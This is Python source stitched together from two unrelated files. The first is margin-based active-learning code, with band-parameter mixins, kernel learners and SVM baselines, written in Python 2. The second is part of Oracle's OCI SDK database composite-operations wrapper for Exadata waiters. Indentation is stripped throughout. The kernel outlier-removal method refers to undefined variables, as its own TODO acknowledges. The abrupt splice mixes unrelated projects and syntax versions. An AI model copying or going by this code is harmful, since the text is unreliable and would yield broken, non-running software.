r = param1.radiusparam
return b, t, r
class LinConst:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
#param1 = BandSelection(self.d, self.num_iters)
#param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.25 * b
r = sqrt(2)
return b, t, r
class LinMin:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
#param1 = BandSelection(self.d, self.num_iters)
#param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.25 * b
r = dotdistance[0]
return b, t, r
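'''
All the Exp/Inv/Lin strategy classes above follow the same mixin pattern: a base class that calls set_parameters, and a small mixin that supplies it. A minimal sketch of the composition with a toy schedule (hypothetical names, not part of this module):
'''

```python
class BandLearner(object):
    # base class: relies on a mixin to provide set_parameters
    def step(self, U, k):
        return self.set_parameters(U, k)

class HalvingBand(object):
    # toy schedule: the band halves each iteration, tau tracks it
    def set_parameters(self, U, k):
        b = 2.0 ** (-k)
        return b, 0.25 * b, 1.0

class HalvingBandLearner(BandLearner, HalvingBand):
    pass
```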
class LinearNoiseMethodAllExpConstantsBatch(MarginBasedBasic, AllExp):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodAllExpConstantsBatchOR(MarginBasedOutlierRemoval, AllExp):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodAllInvConstantsBatch(MarginBasedBasic, AllInv):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodAllInvConstantsBatchOR(MarginBasedOutlierRemoval, AllInv):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodAllLinConstantsBatch(MarginBasedBasic, AllLin):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodAllLinConstantsBatchOR(MarginBasedOutlierRemoval, AllLin):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodExpInvConstantsBatch(MarginBasedBasic, ExpInv):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodExpInvConstantsBatchOR(MarginBasedOutlierRemoval, ExpInv):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodExpLinConstantsBatch(MarginBasedBasic, ExpLin):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodExpLinConstantsBatchOR(MarginBasedOutlierRemoval, ExpLin):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodInvExpConstantsBatch(MarginBasedBasic, InvExp):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodInvExpConstantsBatchOR(MarginBasedOutlierRemoval, InvExp):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodInvLinConstantsBatch(MarginBasedBasic, InvLin):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodInvLinConstantsBatchOR(MarginBasedOutlierRemoval, InvLin):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodLinExpConstantsBatch(MarginBasedBasic, LinExp):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodLinExpConstantsBatchOR(MarginBasedOutlierRemoval, LinExp):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodLinInvConstantsBatch(MarginBasedBasic, LinInv):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodLinInvConstantsBatchOR(MarginBasedOutlierRemoval, LinInv):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class OptimalSeparator(LinearLearner, ActiveBatchLearner):
def __init__(self, d, mean1, mean2):
self.center1 = mean1
self.center2 = mean2
self.d = d
def active_batch_train(self, U, ids, oracle, label_budget):
self.w = self.center1 - self.center2
self.w /= norm(self.w,2)
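'''
OptimalSeparator just normalizes the difference of the class means; the computation is small enough to check directly (hypothetical free-function version):
'''

```python
import numpy as np

def optimal_separator(mean1, mean2):
    # direction from class 2 toward class 1, normalized to unit length
    w = np.asarray(mean1, dtype=float) - np.asarray(mean2, dtype=float)
    return w / np.linalg.norm(w)
```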
################################################################################
# The following is the kernel-based version that could probably replace much of
# the above code once we confirm that it works well.
class KernelMarginBasedActiveLearnerBase(KernelLearner, ActiveBatchLearner):
def __init__(self, d, kernel, num_iters):
KernelLearner.__init__(self, d, kernel)
self.num_iters = num_iters
self.separators = []
self.pointsusage = 0
self.combine_final = False
def initialize_weights(self, X, Y):
# Kernelized averaging: store every labeled point with its label as the support set
self.support = [[Y[i], X[i]] for i in range(len(Y))]
def hinge_loss_minimization(self, X, Y, tau, radius, prevw):
if SOLVER == 'cvxopt':
qp = KernelQPwithLinearBand(self.d, self.kernel)
qp.train(X, Y, tau, radius, prevw)
self.support = qp.support
elif SOLVER == 'sgd':
sgd = KernelHingeLossSGD2(self.d, tau)
sgd.batch_train(X, Y)
self.support = sgd.support
else:
raise ValueError, 'Solver %s not implemented.' % SOLVER
def active_batch_train(self, U, ids, oracle, label_budget):
itr = self.num_iters
count = len(U)
# Set up number of examples in each iteration
m, n = self.compute_sizes(count, label_budget, itr)
'''
# Print some initialization info
print
print self.__class__.__name__
print 'Iterations:', itr
print 'm:', m
print 'n:', n
'''
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
used = set()
for i in range(m[0]):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
used.add(ids[i])
# Pick starting weight vector based on initial sample
self.initialize_weights(X, Y)
# Keep track of all labeled data
R = array([]).reshape((0, self.d))
S = array([]).reshape((0, 1))
for k in range(1, itr):
b, t, r = self.set_parameters(U, k)
if b == 0:
t = pow(0.1,k)
# Print current iteration info
#print
#print 'k:', k
#print 'b:', b
#print 't:', t
#print 'r:', r
# Set of points to send to outlier removal
P = array([]).reshape((0,self.d))
workingset = []
# Find n[k] additional points within the band
while (len(workingset) < n[k]) and (len(used) < count):
next = len(used)
used.add(ids[next])
if abs(self.margin(U[next])) <= b:
P = vstack((P, U[next]))
workingset.append(ids[next])
# Check unlabeled data usage and break if necessary
if len(workingset) != n[k]:
print
print 'Out of unlabeled data.'
break
# Perform outlier removal on P
chosen = self.outlier_removal(P, m[k], b, t)
assert len(chosen) == m[k]
# Query labels of the selected points
X = P[chosen]
Y = array([]).reshape((0, 1))
for i in chosen:
Y = vstack((Y, array([oracle(workingset[i])]).reshape(1,1)))
R = vstack((R, X))
S = vstack((S, Y))
# Perform constrained hinge loss minimization on X, Y
self.hinge_loss_minimization(X, Y, t, r, self.support)
# Print some end of iteration info?
# Calculate the final weight vector based on points labeled so far.
if self.combine_final:
for i in range(len(workingset)):
if len(S) + m[0] < label_budget:
R = vstack((R, P[i]))
S = vstack((S, array([oracle(workingset[i])]).reshape(1,1)))
else:
break
self.hinge_loss_minimization(R, S, t, r, self.support)
self.pointsusage = len(S) + m[0]
'''
# Print final info
print
print 'Label usage:'
print 'budget:', label_budget
print 'used: ', self.pointsusage
print
print 'Unlabeled usage:'
print 'total:', count
print 'used: ', len(used)
'''
class KernelMarginBasedBasic(KernelMarginBasedActiveLearnerBase):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedActiveLearnerBase.__init__(self, d, kernel, num_iters)
def compute_sizes(self, unlabeled, labeled, num_iters):
m = [0] * num_iters
n = [0] * num_iters
# Increase m_i logarithmically
denom = sum(log(i + 2) for i in range(num_iters))
for i in range(num_iters):
m[i] = int(labeled * log(i + 2) / denom)
# Add remaining label budget to last iteration
m[num_iters - 1] += labeled - sum(m)
# Default is no outlier removal, so n = m
for i in range(num_iters):
n[i] = m[i]
return m, n
def outlier_removal(self, P, m, b, tau):
# No outlier removal. Return all indices.
return array(range(m))
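The budget schedule in `compute_sizes` can be checked on its own. This is a minimal standalone sketch of the same logarithmic allocation (the function name is hypothetical, not part of this module); integer truncation leaves a remainder, which is deliberately dumped into the last iteration so the whole budget is spent.

```python
from math import log

def log_budget_schedule(labeled, num_iters):
    """Split a label budget so m_i grows like log(i + 2)."""
    denom = sum(log(i + 2) for i in range(num_iters))
    m = [int(labeled * log(i + 2) / denom) for i in range(num_iters)]
    # int() truncates, so sum(m) can fall short; give the rest to the last round.
    m[-1] += labeled - sum(m)
    return m

m = log_budget_schedule(100, 5)
assert sum(m) == 100  # the full budget is always used
```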
class KernelMarginBasedOutlierRemoval(KernelMarginBasedActiveLearnerBase):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedActiveLearnerBase.__init__(self, d, kernel, num_iters)
def compute_sizes(self, unlabeled, labeled, num_iters):
m = [0] * num_iters
n = [0] * num_iters
# Increase m_i logarithmically
denom = sum(log(i + 2) for i in range(num_iters))
for i in range(num_iters):
m[i] = int(labeled * log(i + 2) / denom)
# Add remaining label budget to last iteration
m[num_iters - 1] += labeled - sum(m)
# Number of unlabeled examples available for outlier removal
#n_total = 0.1 * unlabeled
n_total = 10 * labeled
# Increase n_i exponentially
denom = sum(2.0**i for i in range(0, num_iters))
for i in range(num_iters):
n[i] = int(n_total * 2.0**i / denom) + m[i]
return m, n
def outlier_removal(self, P, m, b, tau):
# TODO: Fix this to remove dependence on w and r.
n = P.shape[0]
# Compute distribution Q over examples in P
outlier = OutlierRemoval(self.d)
outlier.train(P, b, r, tau, w, 0.1)
Q = outlier.weightdist
Q /= lin.norm(Q, 1)
# Sample random indices based on resulting Q
chosen = nprandom.choice(n, size=m, replace=False, p=Q)
return chosen
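The sampling step in `outlier_removal` normalizes a nonnegative weight vector into a distribution Q and draws m distinct indices proportionally to it. A self-contained sketch of that pattern (function name hypothetical; assumes the weights are nonnegative, so the L1 norm is just the sum):

```python
import numpy as np

def sample_by_weights(weights, m, rng=None):
    """Draw m distinct indices with probability proportional to `weights`."""
    rng = rng or np.random.default_rng(0)
    q = np.asarray(weights, dtype=float)
    q = q / q.sum()  # L1-normalize, like Q /= lin.norm(Q, 1) above
    return rng.choice(len(q), size=m, replace=False, p=q)

chosen = sample_by_weights([0.1, 3.0, 0.2, 5.0, 0.05], 2)
assert len(set(chosen)) == 2  # without replacement: indices are distinct
```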
class KernelMarginBasedTheoreticalParams(KernelMarginBasedBasic, Theoretical):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelMarginBasedTheoreticalParamsOR(KernelMarginBasedOutlierRemoval, Theoretical):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodVarianceBatch(KernelMarginBasedBasic, VarianceMethod):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodVarianceBatchOR(KernelMarginBasedOutlierRemoval, VarianceMethod):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllExpConstantsBatch(KernelMarginBasedBasic, AllExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllExpConstantsBatchOR(KernelMarginBasedOutlierRemoval, AllExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllInvConstantsBatch(KernelMarginBasedBasic, AllInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllInvConstantsBatchOR(KernelMarginBasedOutlierRemoval, AllInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllLinConstantsBatch(KernelMarginBasedBasic, AllLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllLinConstantsBatchOR(KernelMarginBasedOutlierRemoval, AllLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodExpInvConstantsBatch(KernelMarginBasedBasic, ExpInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodExpInvConstantsBatchOR(KernelMarginBasedOutlierRemoval, ExpInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodExpLinConstantsBatch(KernelMarginBasedBasic, ExpLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodExpLinConstantsBatchOR(KernelMarginBasedOutlierRemoval, ExpLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodInvExpConstantsBatch(KernelMarginBasedBasic, InvExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodInvExpConstantsBatchOR(KernelMarginBasedOutlierRemoval, InvExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodInvLinConstantsBatch(KernelMarginBasedBasic, InvLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodInvLinConstantsBatchOR(KernelMarginBasedOutlierRemoval, InvLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinExpConstantsBatch(KernelMarginBasedBasic, LinExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinExpConstantsBatchOR(KernelMarginBasedOutlierRemoval, LinExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinInvConstantsBatch(KernelMarginBasedBasic, LinInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinInvConstantsBatchOR(KernelMarginBasedOutlierRemoval, LinInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
# Added classes for testing
class KernelLinearNoiseMethodLinConstInvConstantsBatch(KernelMarginBasedBasic, LinConstInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinIncInvConstantsBatch(KernelMarginBasedBasic, LinIncInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinDecInvConstantsBatch(KernelMarginBasedBasic, LinDecInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinConstConstantsBatch(KernelMarginBasedBasic, LinConst):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinMinConstantsBatch(KernelMarginBasedBasic, LinMin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class ActiveKernelQP(KernelLearner, ActiveBatchLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
X = zeros((m,self.d))
Y = zeros((m,1))
for i in range(m):
X[i] = U[i]
Y[i] = oracle(ids[i])
qp = KernelQP(self.d, self.kernel)
qp.train(X, Y, self.C)
self.support = qp.support
class ActiveKernelQPwithLinearBand(KernelLearner, ActiveBatchLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
X = zeros((m,self.d))
Y = zeros((m,1))
for i in range(m):
X[i] = U[i]
Y[i] = oracle(ids[i])
# Randomly initialize support values
self.support = [[0.5*Y[i], X[i]] for i in range(len(Y))]
#b, t, r = self.set_parameters(U, 1)
r = sqrt(2)
qp = KernelQPwithLinearBand(self.d, self.kernel)
qp.train(X, Y, self.C, r, self.support)
self.support = qp.support
class KernelPassiveSVM(KernelLearner, ActiveBatchLearner, ActiveSourceLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
# Query the labels of m examples
Y = array([oracle(ids[i]) for i in range(m)]).reshape((m, 1))
# Run standard SVM on the labeled data
svm = Kernel_soft_SVM(self.d, self.C, self.kernel)
svm.batch_train(U[:m], Y)
# Use the separator found by SVM
self.support = svm.support
def active_source_train(self, source, oracle, label_budget):
U, ids = source(label_budget)
self.active_batch_train(U, ids, oracle, label_budget)
class KernelSimpleMarginSoftSVMBatch(KernelLearner, ActiveBatchLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
self.initial_sample = 5
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
# Query the labels of some examples
start = min(self.initial_sample, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Run standard SVM on the labeled data
#svm = StochasticDualCoordinateAscent(self.d, self.C, self.kernel)
#svm.train(X, Y)
svm = Kernel_soft_SVM(self.d, self.C, self.kernel)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
margins = []
# Find the unlabeled example with the smallest margin
for i in range(len(U)):
margins.append(abs(svm.margin(U[i])))
min_margin = inf
min_index = 0
for i in range(len(U)):
if ids[i] in used:
continue
cur_margin = margins[i]
if cur_margin < min_margin:
min_margin = cur_margin
min_index = i
# Query its label
X = vstack((X, U[min_index]))
Y = vstack((Y, array([oracle(ids[min_index])]).reshape((1,1))))
used.add(ids[min_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.support = svm.support
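The query loop above is the classic "simple margin" heuristic: after each retrain, label the unlabeled point whose current margin is smallest in absolute value, skipping points already queried. The selection step, isolated from the SVM (the function name and the toy linear margin are illustrative, not from this module):

```python
import numpy as np

def pick_min_margin(margin_fn, U, used_ids, ids):
    """Index of the unqueried point in U with smallest |margin|."""
    best_i, best_m = None, np.inf
    for i, x in enumerate(U):
        if ids[i] in used_ids:
            continue  # never query the same example twice
        m = abs(margin_fn(x))
        if m < best_m:
            best_i, best_m = i, m
    return best_i

# Toy 1-d margin w.x: the point at 0.1 is nearest the boundary.
U = np.array([[2.0], [0.1], [-1.5]])
assert pick_min_margin(lambda x: float(x[0]), U, set(), [0, 1, 2]) == 1
```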
class PassiveSVMDual(KernelLearner, ActiveBatchLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
# Query the labels of m examples
Y = array([oracle(ids[i]) for i in range(m)]).reshape((m, 1))
# Run standard SVM on the labeled data
svm = StochasticDualCoordinateAscent(self.d, self.C, self.kernel)
svm.train(U[:m], Y)
# Use the separator found by SVM
self.support = svm.support
class SVMSGD(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
# Query the labels of m examples
Y = array([oracle(ids[i]) for i in range(m)]).reshape((m, 1))
# Run standard SVM on the labeled data
svm = HingeLossSGD(self.d, self.C)
svm.batch_train(U[:m], Y)
# Use the separator found by SVM
self.w = svm.w
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class DatabaseClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.database.DatabaseClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, work_request_client=None, **kwargs):
"""
Creates a new DatabaseClientCompositeOperations object
:param DatabaseClient client:
The service client which will be wrapped by this object
:param oci.work_requests.WorkRequestClient work_request_client: (optional)
The work request service client which will be used to wait for work request states. Default is None.
"""
self.client = client
self._work_request_client = work_request_client if work_request_client else oci.work_requests.WorkRequestClient(self.client._config, **self.client._kwargs)
def activate_exadata_infrastructure_and_wait_for_work_request(self, exadata_infrastructure_id, activate_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.activate_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ActivateExadataInfrastructureDetails activate_exadata_infrastructure_details: (required)
The activation details for the Exadata infrastructure and the additional storage servers requested.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.activate_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.activate_exadata_infrastructure(exadata_infrastructure_id, activate_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
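Every `*_and_wait_for_work_request` method above follows one pattern: issue the operation, read the ``opc-work-request-id`` header, then poll until the work request reaches a terminal status (compared case-insensitively). Stripped of the SDK types, the polling core looks roughly like this; ``get_status`` is a stand-in for ``get_work_request`` and the parameter names mirror, but are not, the real ``oci.wait_until`` signature:

```python
import time

def wait_until(get_status, target_states, max_wait_seconds=10.0, interval=0.01):
    """Poll get_status() until it returns a state in target_states."""
    targets = {s.lower() for s in target_states}
    deadline = time.monotonic() + max_wait_seconds
    while time.monotonic() < deadline:
        status = get_status()
        # Case-insensitive match, as the composite methods do.
        if status and status.lower() in targets:
            return status
        time.sleep(interval)
    raise TimeoutError("work request did not reach a terminal state")

# Simulated work request: in progress twice, then it succeeds.
states = iter(["IN_PROGRESS", "IN_PROGRESS", "SUCCEEDED"])
assert wait_until(lambda: next(states), ["SUCCEEDED", "FAILED"]) == "SUCCEEDED"
```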
def activate_exadata_infrastructure_and_wait_for_state(self, exadata_infrastructure_id, activate_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.activate_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.ExadataInfrastructure` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ActivateExadataInfrastructureDetails activate_exadata_infrastructure_details: (required)
The activation details for the Exadata infrastructure and the additional storage servers requested.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.activate_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.activate_exadata_infrastructure(exadata_infrastructure_id, activate_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def add_storage_capacity_exadata_infrastructure_and_wait_for_work_request(self, exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.add_storage_capacity_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.add_storage_capacity_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.add_storage_capacity_exadata_infrastructure(exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def add_storage_capacity_exadata_infrastructure_and_wait_for_state(self, exadata_infrastructure_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.add_storage_capacity_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.ExadataInfrastructure` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.add_storage_capacity_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.add_storage_capacity_exadata_infrastructure(exadata_infrastructure_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
